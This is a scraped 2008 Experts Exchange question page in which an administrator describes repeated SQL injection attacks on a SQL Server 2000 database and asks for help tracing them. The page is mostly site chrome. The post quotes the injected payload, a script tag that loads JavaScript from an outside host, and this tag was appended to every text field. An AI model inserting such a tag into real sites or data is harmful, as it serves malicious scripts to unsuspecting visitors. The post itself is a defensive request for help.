July 25, 2008 05:35pm pdt

1. DaveHowe 47,042
2. PowerIT 44,337
3. KCTS 41,257
4. richrumble 36,210
5. IndiGenus 31,121
6. Tolomir 23,594
7. rpggamer... 22,576
8. ahoffmann 21,555
9. CoccoBill 21,048
10. jahboite 19,427
11. r-k 18,900
12. batry_boy 17,600
13. johnb6767 17,548
14. war1 15,943
15. CSecurity 15,570

1. richrumble 614,399
2. Sheharya... 367,467
3. PowerIT 315,572
4. Tolomir 305,000
5. rpggamer... 298,020
6. war1 290,262
7. r-k 260,821
8. ahoffmann 234,562
9. tim_holman 175,246
10. lrmoore 143,435
11. sunray_... 121,147
12. decoleur 110,576
13. CoccoBill 99,010
14. chicagoan 93,255
15. PeteLong 91,398

05.09.2008 at 05:05PM PDT, ID: 23391099

	[x] Attachment Details

[x]

The Solution Rating System

With so many solutions, how can you tell which solutions are most likely to help you and which ones are not? To provide you with a tool to use, we rate our solutions based on various elements that most accurately determine if a solution is a quality solution. To explain what factors affect the solution rating, here are the elements we take into consideration when formulating our solution rating.

The Grade of the Solution
The Zone Rank of the Expert Providing the Solution
The Number of Author and Expert Comments
The Number of Experts Contributing
The Feedback of the Community

Your Input Matters
Because of the way the system is set up, the most important variable in this equation is you. As a member of Experts Exchange, you are able to cast your vote on the quality of the solutions in regard to how complete, accurate, helpful and easy to understand each solution is. When you provide your feedback, each rating is adjusted accordingly. So, if you see a solution that has a poor rating that you think is a good solution, let us know by rating it. As you do, the rating will be adjusted and will become more accurate for other members of our site.

If you have any suggestions that you would like to make for our rating system, please ask a question in the Suggestions Zone of Community Support.

Thank you!

8.4

Virus/SQL Injection Attack

Zone: Miscellaneous Security

Tags: Microsoft, SQL Server 2000, SP4

Hi,

For the past couple of weeks we've been the victims of SQL Injection attacks. It started with the 'nihao1orr.com' (or something like that), but the effect in all the cases was the same....all the text fields in one database were appended with some script text beginning with '<scrip't .... and ending with '.js /script>'. The latest one was at 5:30pm was on the same database...every text field had the following appended to it:

<script src=http://www.kisswow.com.cn/m.js></script>

A couple of days ago I noticed some weird accounts in not just the Production server but in others. They were weird. They didn't have access to any specific databases but 'Master' their default DB. I deleted them all, changed all the SA passwords and rationalized other accounts. And yet we were hit again. Fortunately I set the backups to run on the database that's been hit to run every 2 hours.

Can someone please tell me where the hell this is coming from and how I can stop it!!!!!!!!

This is very urgent! Please help!

P.S. Based on the size of the .trn file at 5:30pm, that's when it happened. Is there anything I can use to look at that file and would it contain anything that might help to nail down the source?

Start your free trial to view this solution

Question Stats

Zone: Security

Question Asked By: paemond

Solution Provided By: jahboite

Participating Experts: 3

Solution Grade: A

Translate:

Loading Advertisement...

20080236-EE-VQP-29 / EE_QW_2_20070628